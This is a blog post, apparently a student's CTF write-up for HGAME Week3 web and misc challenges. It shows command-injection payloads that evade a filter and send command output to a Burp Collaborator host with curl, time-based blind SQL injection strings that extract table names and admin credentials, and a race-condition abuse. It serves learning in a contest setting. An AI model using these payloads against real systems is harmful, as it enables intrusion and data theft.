<!DOCTYPE html>
<html lang="en">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  
  
  <title>HGAME 2022 Week3 writeup by ripple | ripple</title>
  <meta name="author" content="rippleQAQ" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="" />
  
  <meta name="description" content="HGAME 2022 Week3 writeup by rippleWebPing To The Host考察命令注入 打开来是一个ping的网站 先试试127.0.0.1，回显success 一开始尝试直接去ls，发现没有回显以及有一些过滤（返回Waf!） 在学长指导下知道了可以使用curl将回显的内容发送到自己的服务器端。 以下是一些过滤的绕过方法:空格  —&gt;  ${IFS} and">
<meta property="og:type" content="article">
<meta property="og:title" content="HGAME 2022 Week3 writeup by ripple">
<meta property="og:url" content="https://rippleqaq.github.io/2023/01/29/HGAME-Week3/index.html">
<meta property="og:site_name" content="ripple">
<meta property="og:description" content="HGAME 2022 Week3 writeup by rippleWebPing To The Host考察命令注入 打开来是一个ping的网站 先试试127.0.0.1，回显success 一开始尝试直接去ls，发现没有回显以及有一些过滤（返回Waf!） 在学长指导下知道了可以使用curl将回显的内容发送到自己的服务器端。 以下是一些过滤的绕过方法:空格  —&gt;  ${IFS} and">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/ls.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/cdls.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/pingflag.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/1-76.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/sqlflag.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/bp.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/wow.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/HGAME-Week3/hgame.png">
<meta property="article:published_time" content="2023-01-28T16:00:00.000Z">
<meta property="article:modified_time" content="2023-08-02T05:04:42.494Z">
<meta property="article:author" content="rippleQAQ">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rippleqaq.github.io/static/HGAME-Week3/ls.png">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" media="all"></script>
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-color-dark.min.css" media="(prefers-color-scheme: dark)"></script>
    <script src="/js/kr-dark.min.js"></script>
  
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" media="all"></script>
  
  
  <link rel="stylesheet" id="fontawe-css" href="/vendors/font-awesome@4.7.0/css/font-awesome.min.css" media="all"></script>
  <link rel="stylesheet" id="nprogress-css" href="/vendors/nprogress@0.2.0/nprogress.css" media="all"></script>
  
  
    <link rel="stylesheet" href="/vendors/aplayer@1.10.1/dist/APlayer.min.css"></script>
  
  
    <link rel="stylesheet" href="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"></script>
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="/vendors/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="/vendors/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner.webp');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/bg.webp');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 5.4.2"></head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">ripple</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>ripple</h2> <br />
                        <span></span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

            <section class="col-md-8">

        

            <article itemscope itemtype="https://schema.org/Article">
    
    <link itemprop="mainEntityOfPage" href="https://rippleqaq.github.io/2023/01/29/HGAME-Week3/">
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center" itemprop="name headline">HGAME 2022 Week3 writeup by ripple</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><time datetime="2023-01-28T16:00:00.000Z" itemprop="datePublished"><i class="fa fa-calendar"></i> 2023-01-29</time></li>
                <li itemprop="author" itemscope itemtype="https://schema.org/Person">
                    <i class="fa fa-user"></i> 作者 <span itemprop="name">rippleQAQ</span>
                </li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~4.41K
                    
                    字
                </li>
                
            </ul>
        </header>
        <div class="kratos-post-content">
            
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                <div class="icon"><i class="fa fa-warning"></i></div>
                <div class="text"><p>本文最后编辑于 <time datetime="1690952682494"></time> 前，其中的内容可能需要更新。</p></div>
            </div>
            
            
            
                <div class="kratos-post-inner-toc toc-div-class" >
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HGAME-2022-Week3-writeup-by-ripple"><span class="toc-number">1.</span> <span class="toc-text">HGAME 2022 Week3 writeup by ripple</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-number">1.1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Ping-To-The-Host"><span class="toc-number">1.1.1.</span> <span class="toc-text">Ping To The Host</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Login-To-Get-My-Gift"><span class="toc-number">1.1.2.</span> <span class="toc-text">Login To Get My Gift</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Gopher-Shop"><span class="toc-number">1.1.3.</span> <span class="toc-text">Gopher Shop</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-number">1.2.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Tunnel"><span class="toc-number">1.2.1.</span> <span class="toc-text">Tunnel</span></a></li></ol></li></ol></li></ol>
                </div>
            
            <hr />
            <div itemprop="articleBody"><h1 id="HGAME-2022-Week3-writeup-by-ripple"><a href="#HGAME-2022-Week3-writeup-by-ripple" class="headerlink" title="HGAME 2022 Week3 writeup by ripple"></a>HGAME 2022 Week3 writeup by ripple</h1><h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Ping-To-The-Host"><a href="#Ping-To-The-Host" class="headerlink" title="Ping To The Host"></a>Ping To The Host</h3><p>考察命令注入</p>
<p>打开来是一个ping的网站</p>
<p>先试试127.0.0.1，回显success</p>
<p>一开始尝试直接去ls，发现没有回显以及有一些过滤（返回Waf!）</p>
<p>在学长指导下知道了可以使用curl将回显的内容发送到自己的服务器端。</p>
<p>以下是一些过滤的绕过方法:<br>空格  —&gt;  ${IFS}</p>
<p>and   —&gt;  &amp;&amp;</p>
<p>cd      —&gt;  c\d</p>
<p>cat     —&gt;  ca\t</p>
<p>flag   —&gt;  f\lag</p>
<p>主要是采用了\连接符来绕过，还有就是用`先执行命令。</p>
<p>临时先用burpsuite里的Burp Collaborator client，等有空了整一个服务器。</p>
<p>直接ls不能输出全部的，先采用了base64转码：</p>
<p>127.0.0.1${IFS}&amp;&amp;${IFS}curl${IFS}-v${IFS}<a target="_blank" rel="noopener" href="https://n1p1nrike1nss716ioayogudr4xvlk.burpcollaborator.net${ifs}--data${ifs}/%60ls|base64%60">https://n1p1nrike1nss716ioayogudr4xvlk.burpcollaborator.net${IFS}--data${IFS}\`ls|base64`</a></p>
<p><img src="/static/HGAME-Week3/ls.png"></p>
<p>返回：NQphcHAucHkKc3RhdGljCnRlbXBsYXRlcwo=</p>
<p>base64解码得到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">5</span><br><span class="line">app.py</span><br><span class="line">static</span><br><span class="line">templates</span><br></pre></td></tr></table></figure>

<p>这里看了一下文件夹里有没有flag，返回上一层目录找。</p>
<p>127.0.0.1${IFS}&amp;&amp;${IFS}curl${IFS}-v${IFS}<a target="_blank" rel="noopener" href="https://n1p1nrike1nss716ioayogudr4xvlk.burpcollaborator.net${ifs}--data${ifs}/%60c/d$%7BIFS%7D..&amp;&amp;ls|base64%60">https://n1p1nrike1nss716ioayogudr4xvlk.burpcollaborator.net${IFS}--data${IFS}\`c\d${IFS}..&amp;&amp;ls|base64`</a></p>
<p><img src="/static/HGAME-Week3/cdls.png" alt="cdls"></p>
<p>返回：YXBwCmJpbgpib290CmRldgpldGMKZmxhZ19pc19oZXJlX2hhaGEKaG9tZQpsaWIKbGliNjQKbWVk</p>
<p>base64解码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">app</span><br><span class="line">bin</span><br><span class="line">boot</span><br><span class="line">dev</span><br><span class="line">etc</span><br><span class="line">flag_is_here_haha</span><br><span class="line">home</span><br><span class="line">lib</span><br><span class="line">lib64</span><br><span class="line">med</span><br></pre></td></tr></table></figure>

<p>发现flag_is_here_haha，cat一下就行了</p>
<p>127.0.0.1${IFS}&amp;&amp;${IFS}curl${IFS}-v${IFS}<a target="_blank" rel="noopener" href="https://n1p1nrike1nss716ioayogudr4xvlk.burpcollaborator.net${ifs}--data${ifs}/%60c/d$%7BIFS%7D..&amp;&amp;ca/t$%7BIFS%7Dfl/ag_is_here_haha%60">https://n1p1nrike1nss716ioayogudr4xvlk.burpcollaborator.net${IFS}--data${IFS}\`c\d${IFS}..&amp;&amp;ca\t${IFS}fl\ag_is_here_haha`</a></p>
<p><img src="/static/HGAME-Week3/pingflag.png"></p>
<p>得到flag:<strong>hgame{p1nG_t0_ComM4nD_ExecUt1on_dAngErRrRrRrR!}</strong></p>
<h3 id="Login-To-Get-My-Gift"><a href="#Login-To-Get-My-Gift" class="headerlink" title="Login To Get My Gift"></a>Login To Get My Gift</h3><p>考察SQL盲注</p>
<p>由于不会使用脚本，这题我是采用Burpsuite里的Intruder半自动手注</p>
<p>一个一个的找太痛苦啦，不过看着账号密码一点点出来也是很爽的</p>
<p>可以布尔盲注或是时间盲注，我好像都利用了？</p>
<p>返回sleep的回显会慢且最后时fail，返回1时比较快且最后时success，字段也不同。</p>
<p>具体就是把regexp后面的ASCII值换掉，一个个试（Intruder）</p>
<p>然后找到正确的值之后再手动改为下一个，再一个个试出ASCII。</p>
<p><strong>这里要注意regexp和=的区别，regexp不区分大小写且包含就行，一开始被这个坑了，所以先转为ASCII</strong></p>
<p>闭合为 ‘</p>
<p>然后展示一下绕过方法：</p>
<p>and  –&gt;  &amp;&amp;</p>
<p>substr  –&gt;  left(right())</p>
<p>空格  –&gt;  /*1*/</p>
<p>过程比较枯燥，就附一张图吧，其他都是差不多的。</p>
<p><img src="/static/HGAME-Week3/1-76.png"></p>
<p>这是查出数据库名第一位ASCII值为76（L）</p>
<p><strong>查出数据库名长度为7</strong><br>testpassword’/*1*/&amp;&amp;if(length(database())/*1*/regexp/*1*/7,sleep(5),1)#</p>
<p><strong>查出数据库名字为L0g1NMe</strong></p>
<p>testpassword’/*1*/&amp;&amp;/*1*/if(ascii(right(left(database(),1),1))/*1*/regexp/*1*/76,sleep(5),1)#</p>
<p><strong>查出表长14</strong><br>testpassword’/*1*/&amp;&amp;/*1*/if(length((select/*1*/table_name/*1*/from/*1*/information_schema.tables/*1*/where/*1*/table_schema/*1*/regexp/*1*/‘L0g1NMe’/*1*/limit/*1*/0,1))/*1*/regexp/*1*/‘14’,sleep(5),1)#</p>
<p><strong>查出表名User1nf0mAt1on</strong></p>
<p>testpassword’/*1*/&amp;&amp;/*1*/if(ascii(right(left((select/*1*/table_name/*1*/from/*1*/information_schema.tables/*1*/where/*1*/table_schema/*1*/regexp/*1*/‘L0g1NMe’/*1*/limit/*1*/0,1),1),1))/*1*/regexp/*1*/1,sleep(5),1)#</p>
<p><strong>查出字段一长2</strong></p>
<p>testpassword’/*1*/&amp;&amp;/*1*/if(length((select/<em>1</em>/column_name/*1*/from/*1*/information_schema.columns/*1*/where/*1*/table_name/*1*/regexp/*1*/‘User1nf0mAt1on’/*1*/limit/*1*/0,1))/*1*/regexp/*1*/2,sleep(5),1)#</p>
<p><strong>查出字段名一id</strong></p>
<p>testpassword’/*1*/&amp;&amp;/*1*/if(ascii(right(left((select/*1*/column_name/*1*/from/*1*/information_schema.columns/*1*/where/*1*/table_name/*1*/regexp/*1*/‘User1nf0mAt1on’/*1*/limit/*1*/0,1),1),1))/*1*/regexp/*1*/1,sleep(5),1)#</p>
<p><strong>查出字段名二UsErN4me</strong></p>
<p>testpassword’/*1*/&amp;&amp;/*1*/if(ascii(right(left((select/*1*/column_name/*1*/from/*1*/information_schema.columns/*1*/where/*1*/table_name/*1*/regexp/*1*/‘User1nf0mAt1on’/*1*/limit/*1*/1,1),1),1))/*1*/regexp/*1*/1,sleep(5),1)#</p>
<p><strong>查出字段名三PAssw0rD</strong></p>
<p>testpassword’/*1*/&amp;&amp;/*1*/if(ascii(right(left((select/*1*/column_name/*1*/from/*1*/information_schema.columns/*1*/where/*1*/table_name/*1*/regexp/*1*/‘User1nf0mAt1on’/*1*/limit/*1*/2,1),1),1))/*1*/regexp/*1*/1,sleep(5),1)#</p>
<p><strong>查出值hgAmE2023HAppYnEwyEAr</strong><br>testpassword’/*1*/&amp;&amp;/*1*/if(ascii(right(left((select/*1*/UsErN4me/*1*/from/*1*/User1nf0mAt1on/*1*/limit/<em>1</em>/0,1),1),1))/*1*/regexp/*1*/1,sleep(5),1)#</p>
<p><strong>查出值WeLc0meT0hgAmE2023hAPPySql</strong><br>testpassword’/*1*/&amp;&amp;/*1*/if(ascii(right(left((select/*1*/PAssw0rD/*1*/from/*1*/User1nf0mAt1on/*1*/limit/*1*/0,1),1),1))/*1*/regexp/*1*/1,sleep(5),1)#</p>
<p><strong>hgAmE2023HAppYnEwyEAr</strong>就是admin用户名<strong>WeLc0meT0hgAmE2023hAPPySql</strong>是admin密码，用这个登录就行啦！</p>
<p>访问/home路由即为flag。</p>
<p><img src="/static/HGAME-Week3/sqlflag.png"></p>
<p>flag:<strong>hgame{It_1s_1n7EresT1nG_T0_ExPL0Re_Var10us_Ways_To_Sql1njEct1on}</strong></p>
<h3 id="Gopher-Shop"><a href="#Gopher-Shop" class="headerlink" title="Gopher Shop"></a>Gopher Shop</h3><p>考察条件竞争与整型溢出</p>
<p>一开始只想到条件竞争结果days不够用，过快访问一下就没了。</p>
<p>后来询问学长才知道可以通过多买多卖导致整型溢出。</p>
<p>思路就是先买一个Apple，然后通过条件竞争多卖出几个Apple，这时候我们Apple个数就成了负数，结果就是整型溢出让我们有了超级多的Apple，再正常卖出即可得到很多钱去买flag了。</p>
<p>先随便注册一个账号，买一个Apple，使用Burpsuite拦截在卖出时抓包，Forward找到卖出东西的请求包send to Intruder。</p>
<p>clear后选择Null payloads，我这里直接发无穷次了，要手速快点取消掉，不然days就不够了。</p>
<p><img src="/static/HGAME-Week3/bp.png"></p>
<p>取消拦截，就惊奇的发现有了好多Apple（溢出啦）。</p>
<p>我这应该是多卖了30个，钱变成310了。</p>
<p><img src="/static/HGAME-Week3/wow.png"></p>
<p>然后卖苹果买Flag后点Check flag就行了</p>
<p>flag:<strong>hgame{GopherShop_M@gic_1nt_0verflow}</strong></p>
<p>真的很神奇！</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="Tunnel"><a href="#Tunnel" class="headerlink" title="Tunnel"></a>Tunnel</h3><p>由于一开始题目有点小问题偷鸡50分。</p>
<p>Revange版本就一脸懵了。</p>
<p>附件用16进制编译器打开搜索hgame即可找到flag。</p>
<p><img src="/static/HGAME-Week3/hgame.png"></p>
<p>flag:<strong>hgame{ikev1_may_not_safe_aw987rtgh}</strong></p>
<p>WEEK3上强度了，之前还想试试re和crypto的题目的，基本都不会QAQ。</p>
<p>加油加油！收获满满。</p>
<p>(WEEK4太痛苦拉啦啦啦啦啦啦啦QAQAQAQAQAQAQAQAQ</p>
</div>
        </div>
        
            <div class="kratos-copyright text-center clearfix">
                <h5 itemprop="copyrightNotice">本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
            </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "https://rippleqaq.github.io/2023/01/29/HGAME-Week3/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "https://rippleqaq.github.io/2023/01/29/HGAME-Week3/";
            const title         = "「HGAME 2022 Week3 writeup by ripple」";
            const excerpt       = `HGAME 2022 Week3 writeup by rippleWebPing To The Host考察命令注入
打开来是一个ping的网站
先试试127.0.0.1，回显success
一开始尝试直接去ls，发现没有回显以及有...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    
                </div>
                <div class="pull-date">
                    <time datetime="2023-08-02T05:04:42.494Z" itemprop="dateModified">最后编辑：2023-08-02</time>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" flask中debug、host、port的配置方法(pycharm社区版)" href="/2023/01/05/flask_configure/">&lt; 上一篇</a>
            </div>
            
            
            <div class="nav-next clearfix">
                <a title=" HGAME 2022 Week4 writeup by ripple" href="/2023/02/03/HGAME-Week4/">下一篇 &gt;</a>
            </div>
            
        </nav>
    
    
</article>

        

            </section>

        

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/static/1.jpg" loading="lazy" decoding="auto" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center"></p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                文章
            </span>
            <span class="count">
                17
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                分类
            </span>
            <span class="count">
                5
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                标签
            </span>
            <span class="count">
                0
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                    <aside id="krw-toc" class="widget widget-kratos-toc clearfix toc-div-class" >
    <div class="photo-background"></div>
    <h4 class="widget-title no-after">
        <i class="fa fa-compass"></i>
        文章目录
        <span class="toc-progress-bar" role="progressbar" aria-label="阅读进度："></span>
    </h4>
    <div class="textwidget">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HGAME-2022-Week3-writeup-by-ripple"><span class="toc-text">HGAME 2022 Week3 writeup by ripple</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Ping-To-The-Host"><span class="toc-text">Ping To The Host</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Login-To-Get-My-Gift"><span class="toc-text">Login To Get My Gift</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Gopher-Shop"><span class="toc-text">Gopher Shop</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Tunnel"><span class="toc-text">Tunnel</span></a></li></ol></li></ol></li></ol>
    </div>
</aside>
                
                
  <aside id="krw-categories" class="widget widget-kratos-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>分类目录</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><span class="category-list-count">6</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/match/">match</a><span class="category-list-count">6</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/blog/">blog</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/flask/">flask</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux/">linux</a><span class="category-list-count">2</span></li></ul>
  </aside>


            
                
            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/2023/09/21/blog_demain_deploy/"><i class="fa  fa-book"></i> 为博客设置个人域名</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/09/21/123/test/"><i class="fa  fa-book"></i> 123123</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/04/04/flask_variable/"><i class="fa  fa-book"></i> flask路由与视图映射与传参规则</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/03/11/HGAME-Final/"><i class="fa  fa-book"></i> HGAME 2022 FINAL writeup by ripple</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/03/09/build_environment/"><i class="fa  fa-book"></i> linux内基本环境搭建</a>
            
          
        
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://t.me/CandyUnion"><i class="fa fa-telegram"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="me" href="https://nya.one/@rippleQAQ"><i class="fa fa fa-share-alt-square"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://github.com/rippleQAQ"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2023 ripple 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by rippleQAQ.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="/vendors/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="/vendors/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>


    <script async src="/js/candy.min.js"></script>



    <script defer src="/vendors/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="/vendors/meting@2.0.1/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="3204190542"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/vendors/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>